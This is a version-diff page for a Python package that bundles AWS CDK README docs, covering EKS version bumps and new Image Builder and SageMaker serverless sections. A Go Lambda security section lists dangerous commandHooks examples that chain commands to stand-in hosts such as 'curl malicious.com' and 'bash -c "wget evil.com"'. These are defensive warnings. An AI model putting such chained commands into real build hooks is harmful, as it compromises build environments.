PyPI - konokenj.cdk-api-mcp-server - Versions diffs - 0.52.0__py3-none-any.whl → 0.54.0__py3-none-any.whl - Mend

konokenj.cdk-api-mcp-server 0.52.0py3-none-any.whl → 0.54.0py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (58) hide show

cdk_api_mcp_server/__about__.py CHANGED Viewed

@@ -1,4 +1,4 @@
 # SPDX-FileCopyrightText: 2025-present Kenji Kono <konoken@amazon.co.jp>
 #
 # SPDX-License-Identifier: MIT
-__version__ = "0.52.0"
+__version__ = "0.54.0"

cdk_api_mcp_server/resources/aws-cdk/constructs/@aws-cdk/aws-eks-v2-alpha/README.md CHANGED Viewed

@@ -33,7 +33,7 @@ Here is the minimal example of defining an AWS EKS cluster
 ```ts
 const cluster = new eks.Cluster(this, 'hello-eks', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
 });
 ```
@@ -68,7 +68,7 @@ In a nutshell:
   ```ts
   const cluster = new eks.Cluster(this, 'AutoModeCluster', {
-    version: eks.KubernetesVersion.V1_33,
+    version: eks.KubernetesVersion.V1_34,
     // Auto Mode is enabled by default
   });
   ```
@@ -81,7 +81,7 @@ In a nutshell:
   ```ts
   const cluster = new eks.Cluster(this, 'ManagedNodeCluster', {
-    version: eks.KubernetesVersion.V1_33,
+    version: eks.KubernetesVersion.V1_34,
     defaultCapacityType: eks.DefaultCapacityType.NODEGROUP,
   });
@@ -98,7 +98,7 @@ In a nutshell:
   ```ts
   const cluster = new eks.FargateCluster(this, 'FargateCluster', {
-    version: eks.KubernetesVersion.V1_33,
+    version: eks.KubernetesVersion.V1_34,
   });
   ```
@@ -108,7 +108,7 @@ In a nutshell:
   ```ts
   const cluster = new eks.Cluster(this, 'SelfManagedCluster', {
-    version: eks.KubernetesVersion.V1_33,
+    version: eks.KubernetesVersion.V1_34,
   });
   // Add self-managed Auto Scaling Group
@@ -128,7 +128,7 @@ Creating a new cluster is done using the `Cluster` constructs. The only required
 ```ts
 new eks.Cluster(this, 'HelloEKS', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
 });
 ```
@@ -136,7 +136,7 @@ You can also use `FargateCluster` to provision a cluster that uses only fargate
 ```ts
 new eks.FargateCluster(this, 'HelloEKS', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
 });
 ```
@@ -145,12 +145,12 @@ be created by default. It will only be deployed when `kubectlProviderOptions`
 property is used.**
 ```ts
-import { KubectlV33Layer } from '@aws-cdk/lambda-layer-kubectl-v33';
+import { KubectlV34Layer } from '@aws-cdk/lambda-layer-kubectl-v34';
 new eks.Cluster(this, 'hello-eks', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   kubectlProviderOptions: {
-    kubectlLayer: new KubectlV33Layer(this, 'kubectl'),
+    kubectlLayer: new KubectlV34Layer(this, 'kubectl'),
   }
 });
 ```
@@ -168,7 +168,7 @@ Auto Mode is enabled by default when creating a new cluster without specifying a
 ```ts
 // Create EKS cluster with Auto Mode implicitly enabled
 const cluster = new eks.Cluster(this, 'EksAutoCluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
 });
 ```
@@ -177,7 +177,7 @@ You can also explicitly enable Auto Mode using `defaultCapacityType`:
 ```ts
 // Create EKS cluster with Auto Mode explicitly enabled
 const cluster = new eks.Cluster(this, 'EksAutoCluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   defaultCapacityType: eks.DefaultCapacityType.AUTOMODE,
 });
 ```
@@ -193,7 +193,7 @@ These node pools are managed automatically by EKS. You can configure which node
 ```ts
 const cluster = new eks.Cluster(this, 'EksAutoCluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   defaultCapacityType: eks.DefaultCapacityType.AUTOMODE,
   compute: {
     nodePools: ['system', 'general-purpose'],
@@ -209,7 +209,7 @@ You can disable the default node pools entirely by setting an empty array for `n
 ```ts
 const cluster = new eks.Cluster(this, 'EksAutoCluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   defaultCapacityType: eks.DefaultCapacityType.AUTOMODE,
   compute: {
     nodePools: [], // Disable default node pools
@@ -226,7 +226,7 @@ If you prefer to manage your own node groups instead of using Auto Mode, you can
 ```ts
 // Create EKS cluster with traditional managed node group
 const cluster = new eks.Cluster(this, 'EksCluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   defaultCapacityType: eks.DefaultCapacityType.NODEGROUP,
   defaultCapacity: 3, // Number of instances
   defaultCapacityInstance: ec2.InstanceType.of(ec2.InstanceClass.T3, ec2.InstanceSize.LARGE),
@@ -237,7 +237,7 @@ You can also create a cluster with no initial capacity and add node groups later
 ```ts
 const cluster = new eks.Cluster(this, 'EksCluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   defaultCapacityType: eks.DefaultCapacityType.NODEGROUP,
   defaultCapacity: 0,
 });
@@ -258,7 +258,7 @@ You can combine Auto Mode with traditional node groups for specific workload req
 ```ts
 const cluster = new eks.Cluster(this, 'Cluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   defaultCapacityType: eks.DefaultCapacityType.AUTOMODE,
   compute: {
     nodePools: ['system', 'general-purpose'],
@@ -298,7 +298,7 @@ By default, when using `DefaultCapacityType.NODEGROUP`, this library will alloca
 ```ts
 new eks.Cluster(this, 'HelloEKS', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   defaultCapacityType: eks.DefaultCapacityType.NODEGROUP,
 });
 ```
@@ -307,7 +307,7 @@ At cluster instantiation time, you can customize the number of instances and the
 ```ts
 new eks.Cluster(this, 'HelloEKS', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   defaultCapacityType: eks.DefaultCapacityType.NODEGROUP,
   defaultCapacity: 5,
   defaultCapacityInstance: ec2.InstanceType.of(ec2.InstanceClass.M5, ec2.InstanceSize.SMALL),
@@ -320,7 +320,7 @@ Additional customizations are available post instantiation. To apply them, set t
 ```ts
 const cluster = new eks.Cluster(this, 'HelloEKS', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   defaultCapacityType: eks.DefaultCapacityType.NODEGROUP,
   defaultCapacity: 0,
 });
@@ -371,7 +371,7 @@ The following code defines an Amazon EKS cluster with a default Fargate Profile
 ```ts
 const cluster = new eks.FargateCluster(this, 'MyCluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
 });
 ```
@@ -390,7 +390,7 @@ You can add self-managed capacity to any cluster using the `addAutoScalingGroupC
 ```ts
 const cluster = new eks.Cluster(this, 'Cluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
 });
 cluster.addAutoScalingGroupCapacity('self-managed-nodes', {
@@ -422,7 +422,7 @@ You can configure the [cluster endpoint access](https://docs.aws.amazon.com/eks/
 ```ts
 const cluster = new eks.Cluster(this, 'hello-eks', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   endpointAccess: eks.EndpointAccess.PRIVATE, // No access outside of your VPC.
 });
 ```
@@ -444,7 +444,7 @@ To deploy the controller on your EKS cluster, configure the `albController` prop
 ```ts
 new eks.Cluster(this, 'HelloEKS', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   albController: {
     version: eks.AlbControllerVersion.V2_8_2,
   },
@@ -485,7 +485,7 @@ You can specify the VPC of the cluster using the `vpc` and `vpcSubnets` properti
 declare const vpc: ec2.Vpc;
 new eks.Cluster(this, 'HelloEKS', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   vpc,
   vpcSubnets: [{ subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS }],
 });
@@ -528,12 +528,12 @@ To create a `Kubectl Handler`, use `kubectlProviderOptions` when creating the cl
 `kubectlLayer` is the only required property in `kubectlProviderOptions`.
 ```ts
-import { KubectlV33Layer } from '@aws-cdk/lambda-layer-kubectl-v33';
+import { KubectlV34Layer } from '@aws-cdk/lambda-layer-kubectl-v34';
 new eks.Cluster(this, 'hello-eks', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   kubectlProviderOptions: {
-    kubectlLayer: new KubectlV33Layer(this, 'kubectl'),
+    kubectlLayer: new KubectlV34Layer(this, 'kubectl'),
   }
 });
 ```
@@ -562,12 +562,12 @@ const cluster = eks.Cluster.fromClusterAttributes(this, 'Cluster', {
 You can configure the environment of this function by specifying it at cluster instantiation. For example, this can be useful in order to configure an http proxy:
 ```ts
-import { KubectlV33Layer } from '@aws-cdk/lambda-layer-kubectl-v33';
+import { KubectlV34Layer } from '@aws-cdk/lambda-layer-kubectl-v34';
 const cluster = new eks.Cluster(this, 'hello-eks', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   kubectlProviderOptions: {
-    kubectlLayer: new KubectlV33Layer(this, 'kubectl'),
+    kubectlLayer: new KubectlV34Layer(this, 'kubectl'),
     environment: {
         'http_proxy': 'http://proxy.myproxy.com',
     },
@@ -588,12 +588,12 @@ Depending on which version of kubernetes you're targeting, you will need to use
 the `@aws-cdk/lambda-layer-kubectl-vXY` packages.
 ```ts
-import { KubectlV33Layer } from '@aws-cdk/lambda-layer-kubectl-v33';
+import { KubectlV34Layer } from '@aws-cdk/lambda-layer-kubectl-v34';
 const cluster = new eks.Cluster(this, 'hello-eks', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   kubectlProviderOptions: {
-    kubectlLayer: new KubectlV33Layer(this, 'kubectl'),
+    kubectlLayer: new KubectlV34Layer(this, 'kubectl'),
   },
 });
 ```
@@ -603,14 +603,14 @@ const cluster = new eks.Cluster(this, 'hello-eks', {
 By default, the kubectl provider is configured with 1024MiB of memory. You can use the `memory` option to specify the memory size for the AWS Lambda function:
 ```ts
-import { KubectlV33Layer } from '@aws-cdk/lambda-layer-kubectl-v33';
+import { KubectlV34Layer } from '@aws-cdk/lambda-layer-kubectl-v34';
 new eks.Cluster(this, 'MyCluster', {
   kubectlProviderOptions: {
-    kubectlLayer: new KubectlV33Layer(this, 'kubectl'),
+    kubectlLayer: new KubectlV34Layer(this, 'kubectl'),
     memory: Size.gibibytes(4),
   },
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
 });
 ```
@@ -641,7 +641,7 @@ When you create a cluster, you can specify a `mastersRole`. The `Cluster` constr
 ```ts
 declare const role: iam.Role;
 new eks.Cluster(this, 'HelloEKS', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   mastersRole: role,
 });
 ```
@@ -662,7 +662,7 @@ You can use the `secretsEncryptionKey` to configure which key the cluster will u
 const secretsKey = new kms.Key(this, 'SecretsKey');
 const cluster = new eks.Cluster(this, 'MyCluster', {
   secretsEncryptionKey: secretsKey,
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
 });
 ```
@@ -672,7 +672,7 @@ You can also use a similar configuration for running a cluster built using the F
 const secretsKey = new kms.Key(this, 'SecretsKey');
 const cluster = new eks.FargateCluster(this, 'MyFargateCluster', {
   secretsEncryptionKey: secretsKey,
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
 });
 ```
@@ -713,7 +713,7 @@ eks.AccessPolicy.fromAccessPolicyName('AmazonEKSAdminPolicy', {
 Use `grantAccess()` to grant the AccessPolicy to an IAM principal:
 ```ts
-import { KubectlV33Layer } from '@aws-cdk/lambda-layer-kubectl-v33';
+import { KubectlV34Layer } from '@aws-cdk/lambda-layer-kubectl-v34';
 declare const vpc: ec2.Vpc;
 const clusterAdminRole = new iam.Role(this, 'ClusterAdminRole', {
@@ -727,9 +727,9 @@ const eksAdminRole = new iam.Role(this, 'EKSAdminRole', {
 const cluster = new eks.Cluster(this, 'Cluster', {
   vpc,
   mastersRole: clusterAdminRole,
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   kubectlProviderOptions: {
-    kubectlLayer: new KubectlV33Layer(this, 'kubectl'),
+    kubectlLayer: new KubectlV34Layer(this, 'kubectl'),
     memory: Size.gibibytes(4),
   },
 });
@@ -914,7 +914,7 @@ when a cluster is defined:
 ```ts
 new eks.Cluster(this, 'MyCluster', {
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   prune: false,
 });
 ```
@@ -1230,7 +1230,7 @@ property. For example:
 ```ts
 const cluster = new eks.Cluster(this, 'Cluster', {
   // ...
-  version: eks.KubernetesVersion.V1_33,
+  version: eks.KubernetesVersion.V1_34,
   clusterLogging: [
     eks.ClusterLoggingTypes.API,
     eks.ClusterLoggingTypes.AUTHENTICATOR,

cdk_api_mcp_server/resources/aws-cdk/constructs/@aws-cdk/aws-imagebuilder-alpha/README.md ADDED Viewed

@@ -0,0 +1,94 @@
+# EC2 Image Builder Construct Library
+<!--BEGIN STABILITY BANNER-->
+---
+![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge)
+> The APIs of higher level constructs in this module are experimental and under active development.
+> They are subject to non-backward compatible changes or removal in any future version. These are
+> not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be
+> announced in the release notes. This means that while you may use them, you may need to update
+> your source code when upgrading to a newer version of this package.
+---
+<!--END STABILITY BANNER-->
+This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project.
+## README
+[Amazon EC2 Image Builder](https://docs.aws.amazon.com/imagebuilder/latest/userguide/what-is-image-builder.html) is a
+fully managed AWS service that helps you automate the creation, management, and deployment of customized, secure, and
+up-to-date server images. You can use Image Builder to create Amazon Machine Images (AMIs) and container images for use
+across AWS Regions.
+This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project. It allows you to define
+Image Builder pipelines, images, recipes, components, workflows, and lifecycle policies.
+A component defines the sequence of steps required to customize an instance during image creation (build component) or
+test an instance launched from the created image (test component). Components are created from declarative YAML or JSON
+documents that describe runtime configuration for building, validating, or testing instances. Components are included
+when added to the image recipe or container recipe for an image build.
+EC2 Image Builder supports AWS-managed components for common tasks, AWS Marketplace components, and custom components
+that you create. Components run during specific workflow phases: build and validate phases during the build stage, and
+test phase during the test stage.
+### Infrastructure Configuration
+Infrastructure configuration defines the compute resources and environment settings used during the image building
+process. This includes instance types, IAM instance profile, VPC settings, subnets, security groups, SNS topics for
+notifications, logging configuration, and troubleshooting settings like whether to terminate instances on failure or
+keep them running for debugging. These settings are applied to builds when included in an image or an image pipeline.
+```ts
+const infrastructureConfiguration = new imagebuilder.InfrastructureConfiguration(this, 'InfrastructureConfiguration', {
+  infrastructureConfigurationName: 'test-infrastructure-configuration',
+  description: 'An Infrastructure Configuration',
+  // Optional - instance types to use for build/test
+  instanceTypes: [
+    ec2.InstanceType.of(ec2.InstanceClass.STANDARD7_INTEL, ec2.InstanceSize.LARGE),
+    ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE3, ec2.InstanceSize.LARGE)
+  ],
+  // Optional - create an instance profile with necessary permissions
+  instanceProfile: new iam.InstanceProfile(this, 'InstanceProfile', {
+    instanceProfileName: 'test-instance-profile',
+    role: new iam.Role(this, 'InstanceProfileRole', {
+      assumedBy: iam.ServicePrincipal.fromStaticServicePrincipleName('ec2.amazonaws.com'),
+      managedPolicies: [
+        iam.ManagedPolicy.fromAwsManagedPolicyName('AmazonSSMManagedInstanceCore'),
+        iam.ManagedPolicy.fromAwsManagedPolicyName('EC2InstanceProfileForImageBuilder')
+      ]
+    })
+  }),
+  // Use VPC network configuration
+  vpc,
+  subnetSelection: { subnetType: ec2.SubnetType.PUBLIC },
+  securityGroups: [ec2.SecurityGroup.fromSecurityGroupId(this, 'SecurityGroup', vpc.vpcDefaultSecurityGroup)],
+  keyPair: ec2.KeyPair.fromKeyPairName(this, 'KeyPair', 'imagebuilder-instance-key-pair'),
+  terminateInstanceOnFailure: true,
+  // Optional - IMDSv2 settings
+  httpTokens: imagebuilder.HttpTokens.REQUIRED,
+  httpPutResponseHopLimit: 1,
+  // Optional - publish image completion messages to an SNS topic
+  notificationTopic: sns.Topic.fromTopicArn(
+    this,
+    'Topic',
+    this.formatArn({ service: 'sns', resource: 'image-builder-topic' })
+  ),
+  // Optional - log settings. Logging is enabled by default
+  logging: {
+    s3Bucket: s3.Bucket.fromBucketName(this, 'LogBucket', `imagebuilder-logging-${Aws.ACCOUNT_ID}`),
+    s3KeyPrefix: 'imagebuilder-logs'
+  },
+  // Optional - host placement settings
+  ec2InstanceAvailabilityZone: Stack.of(this).availabilityZones[0],
+  ec2InstanceHostId: dedicatedHost.attrHostId,
+  ec2InstanceTenancy: imagebuilder.Tenancy.HOST,
+  resourceTags: {
+    Environment: 'production'
+  }
+});
+```

cdk_api_mcp_server/resources/aws-cdk/constructs/@aws-cdk/aws-lambda-go-alpha/README.md CHANGED Viewed

@@ -170,6 +170,8 @@ new go.GoFunction(this, 'handler', {
 });
 ```
+**⚠️ Security Warning**: Build flags are passed directly to the Go build command and can execute arbitrary commands during bundling. Only use trusted values and avoid flags like `-toolexec` with untrusted arguments. Be especially cautious with third-party CDK constructs that may contain malicious build flags. The CDK will display a warning during synthesis when `goBuildFlags` is used.
 By default this construct doesn't use any Go module proxies. This is contrary to
 a standard Go installation, which would use the Google proxy by default. To
 recreate that behavior, do the following:
@@ -200,19 +202,21 @@ new go.GoFunction(this, 'GoFunction', {
 ## Command hooks
-It is  possible to run additional commands by specifying the `commandHooks` prop:
+It is possible to run additional commands by specifying the `commandHooks` prop:
-```text
-// This example only available in TypeScript
+```ts
 // Run additional commands on a GoFunction via `commandHooks` property
 new go.GoFunction(this, 'handler', {
+  entry: 'cmd/api',
   bundling: {
     commandHooks: {
       // run tests
       beforeBundling(inputDir: string): string[] {
         return ['go test ./cmd/api -v'];
       },
-      // ...
+      afterBundling(inputDir: string, outputDir: string): string[] {
+        return ['echo "Build complete"'];
+      },
     },
   },
 });
@@ -230,6 +234,100 @@ an array of commands to run. Commands are chained with `&&`.
 The commands will run in the environment in which bundling occurs: inside the
 container for Docker bundling or on the host OS for local bundling.
+### ⚠️ Security Considerations
+**Command hooks execute arbitrary shell commands** during the bundling process. Only use trusted commands:
+**Safe patterns (cross-platform):**
+```ts
+new go.GoFunction(this, 'SafeFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test ./...',           // ✅ Standard Go commands work on all OS
+        'go mod tidy',             // ✅ Go module commands
+        'make clean',              // ✅ Build tools (if available)
+        'echo "Building app"',     // ✅ Simple output with quotes
+      ],
+      afterBundling: () => ['echo "Build complete"'],
+    },
+  },
+});
+```
+**Dangerous patterns to avoid:**
+*Windows-specific dangers:*
+```ts
+// ❌ Windows-specific dangers
+new go.GoFunction(this, 'UnsafeWindowsFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test & curl.exe malicious.com',     // ❌ Command chaining with &
+        'echo %USERPROFILE%',                   // ❌ Environment variable expansion
+        'powershell -Command "..."',            // ❌ PowerShell execution
+      ],
+      afterBundling: () => [],
+    },
+  },
+});
+```
+*Unix/Linux/macOS dangers:*
+```ts
+// ❌ Unix/Linux/macOS dangers
+new go.GoFunction(this, 'UnsafeUnixFunction', {
+  entry: 'cmd/api',
+  bundling: {
+    commandHooks: {
+      beforeBundling: () => [
+        'go test; curl malicious.com',          // ❌ Command chaining with ;
+        'echo $(whoami)',                       // ❌ Command substitution
+        'bash -c "wget evil.com"',              // ❌ Shell execution
+      ],
+      afterBundling: () => [],
+    },
+  },
+});
+```
+**When using third-party constructs** that include `GoFunction`:
+* Review the construct's source code before use
+* Verify what commands it executes via `commandHooks` and `goBuildFlags`
+* Only use constructs from trusted publishers
+* Test in isolated environments first
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
+For more security guidance, see [AWS CDK Security Best Practices](https://docs.aws.amazon.com/cdk/latest/guide/security.html).
+## Security Best Practices
+### Third-Party Construct Safety
+When using third-party CDK constructs that utilize `GoFunction`, exercise caution:
+1. **Review source code** - Inspect the construct implementation for `commandHooks` and `goBuildFlags` usage
+2. **Verify publishers** - Use constructs only from trusted, verified sources
+3. **Pin versions** - Use exact versions to prevent supply chain attacks
+4. **Isolated testing** - Test third-party constructs in sandboxed environments
+**Before using any third-party construct:**
+* Review the construct's source code on GitHub or npm
+* Search for `commandHooks` and `goBuildFlags` usage in the code
+* Verify no dangerous command patterns are present
+* Use exact version pinning to prevent supply chain attacks
+The `GoFunction` construct will display CDK warnings during synthesis when potentially unsafe `commandHooks` or `goBuildFlags` are detected.
 ## Additional considerations
 Depending on how you structure your Golang application, you may want to change the `assetHashType` parameter.

cdk_api_mcp_server/resources/aws-cdk/constructs/@aws-cdk/aws-sagemaker-alpha/README.md CHANGED Viewed

@@ -214,6 +214,38 @@ const endpointConfig = new sagemaker.EndpointConfig(this, 'EndpointConfig', {
 });
 ```
+### Serverless Inference
+Amazon SageMaker Serverless Inference is a purpose-built inference option that makes it easy for you to deploy and scale ML models. Serverless endpoints automatically launch compute resources and scale them in and out depending on traffic, eliminating the need to choose instance types or manage scaling policies. For more information, see [SageMaker Serverless Inference](https://docs.aws.amazon.com/sagemaker/latest/dg/serverless-endpoints.html).
+To create a serverless endpoint configuration, use the `serverlessProductionVariant` property:
+```typescript
+import * as sagemaker from '@aws-cdk/aws-sagemaker-alpha';
+declare const model: sagemaker.Model;
+const endpointConfig = new sagemaker.EndpointConfig(this, 'ServerlessEndpointConfig', {
+  serverlessProductionVariant: {
+    model: model,
+    variantName: 'serverlessVariant',
+    maxConcurrency: 10,
+    memorySizeInMB: 2048,
+    provisionedConcurrency: 5, // optional
+  },
+});
+```
+Serverless inference is ideal for workloads with intermittent or unpredictable traffic patterns. You can configure:
+- `maxConcurrency`: Maximum concurrent invocations (1-200)
+- `memorySizeInMB`: Memory allocation in 1GB increments (1024, 2048, 3072, 4096, 5120, or 6144 MB)
+- `provisionedConcurrency`: Optional pre-warmed capacity to reduce cold starts
+**Note**: Provisioned concurrency incurs charges even when the endpoint is not processing requests. Use it only when you need to minimize cold start latency.
+You cannot mix serverless and instance-based variants in the same endpoint configuration.
 ### Endpoint
 When you create an endpoint from an `EndpointConfig`, Amazon SageMaker launches the ML compute

konokenj.cdk-api-mcp-server 0.52.0__py3-none-any.whl → 0.54.0__py3-none-any.whl

konokenj.cdk-api-mcp-server 0.52.0py3-none-any.whl → 0.54.0py3-none-any.whl